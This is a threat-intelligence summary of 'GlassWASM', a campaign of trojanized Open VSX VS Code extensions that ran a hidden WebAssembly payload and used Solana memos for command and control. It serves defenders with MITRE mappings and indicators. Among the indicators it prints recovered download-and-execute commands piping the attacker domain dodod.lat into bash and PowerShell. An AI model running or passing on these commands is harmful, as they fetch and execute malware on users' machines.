Threat Research

GlassWASM: WebAssembly Malware Found in Trojanized Open VSX Extensions

SocketDev
GlassWASM: WebAssembly Malware Found in Trojanized Open VSX Extensions
Socket’s Threat Research team uncovered trojanized Open VSX Visual Studio Code extensions that delivered a TinyGo-compiled WebAssembly payload and used Solana memos as a takedown-resistant command-and-control dead drop. The campaign, attributed with medium confidence to the GlassWorm developer, was dubbed “GlassWASM” and involved packages impersonating ExarGD.vsblack and noellee-doc.flint-debug. #GlassWASM #OpenVSX #Solana #GlassWorm

Keypoints

  • The malicious packages were trojanized clones of legitimate VS Code extensions republished on Open VSX under the impersonated publisher account zaitoona43.
  • The affected Open VSX packages were exargd/[email protected] and noellee-doc/[email protected].
  • The extensions auto-executed a hidden WebAssembly payload on activation through a TinyGo loader and bootstrap code.
  • The WebAssembly module used ChaCha20 string encryption, leaving no readable network indicators or commands in the static file.
  • It polled the Solana mainnet JSON-RPC API, read attacker instructions from SPL Memo fields, and resolved a rotating second-stage host from on-chain data.
  • The recovered second-stage infrastructure pointed to dodod.lat and platform-specific download-and-execute commands for macOS, Linux, and Windows.
  • The report links this activity to GlassWorm tradecraft and recommends blocking the wallet, hunting Node.js child_process execution, and treating shipped .wasm files in extensions as high risk.

MITRE Techniques

  • [T1059.007 ] JavaScript – The payload is loaded and driven through a JavaScript host using the TinyGo wasm_exec.js glue and syscall/js bridge (‘loaded and executed by a JavaScript host’).
  • [T1027 ] Obfuscated Files or Information – The module hides strings and indicators with ChaCha20 encryption and runtime reconstruction (‘Every string of consequence is encrypted in the binary with a ChaCha20 cipher and reconstructed in memory only at runtime’).
  • [T1105 ] Ingress Tool Transfer – It downloads a second-stage script over HTTPS with curl or Invoke-RestMethod before execution (‘curl -fsSL https:///… | bash’ and ‘irm https:///… | iex’).
  • [T1055 ] Process Injection – Not mentioned.
  • [T1059.004 ] Unix Shell – The Linux and macOS branches execute downloaded content through bash (‘curl -fsSL … | bash’).
  • [T1059.001 ] PowerShell – The Windows branch runs a fileless command using PowerShell and Invoke-Expression (‘powershell -Command “irm … | iex”‘).
  • [T1106 ] Native API – The module invokes Node.js child_process.execSync to spawn commands from the host runtime (‘require(‘child_process’).execSync(cmd, { windowsHide:true })’).
  • [T1204 ] User Execution – The trojanized extensions use fake utility framing and impersonation to trigger activation by the user (‘a theme; a “transaction hash” debugger’ and ‘identity impersonation’).
  • [T1569.002 ] System Services: Service Execution – Not mentioned.
  • [T1587.001 ] Develop Capabilities: Malware – The payload is a compiled WebAssembly malware family labeled GlassWASM (‘we have labeled this family “GlassWASM”‘).
  • [T1090 ] Proxy – Not mentioned.
  • [T1071.001 ] Web Protocols – The malware communicates with the Solana JSON-RPC API over HTTPS (‘POST ‘).
  • [T1102.002 ] Bidirectional Communication – Not mentioned.
  • [T1021.004 ] Remote Services: SSH – Not mentioned.

Indicators of Compromise

  • [File hashes ] WebAssembly payload and extension packages – SHA-256 558b4f1d9a263c13756ab0126c09dd080c85ba405b29488e1c4e6aa68b554f1f, SHA-1 8ebac142e34a20c297d3ccaca7ee5d9ddd24fed4, and 2 more hashes.
  • [File names ] Malicious WebAssembly payload and VSIX packages – snqpkebiwrxmoivl.wasm, exargd.vsblack-0.0.1.vsix, and 1 more file.
  • [Domains ] C2 and Solana endpoint infrastructure – dodod.lat, api.mainnet.solana.com.
  • [URLs ] Runtime second-stage download paths – https://dodod.lat/darwin/i/_, https://dodod.lat/linux/i/_.
  • [Wallet address ] Solana dead-drop wallet polled for instructions – 6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz.
  • [Program IDs ] SPL Memo programs used to extract attacker instructions – MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr, Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFM.
  • [Package names ] Open VSX trojanized extensions – vscode/exargd/[email protected], vscode/noellee-doc/[email protected].
  • [Account / publisher ] Malicious Open VSX uploader – github.com/zaitoona43.
  • [Command strings ] Fileless execution commands recovered from memory – curl -fsSL https://dodod.lat//i/_ | bash, powershell -Command “irm https://dodod.lat/win32/i/_ | iex”.

Read more: https://socket.dev/blog/glasswasm-malware-open-vsx-extensions

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint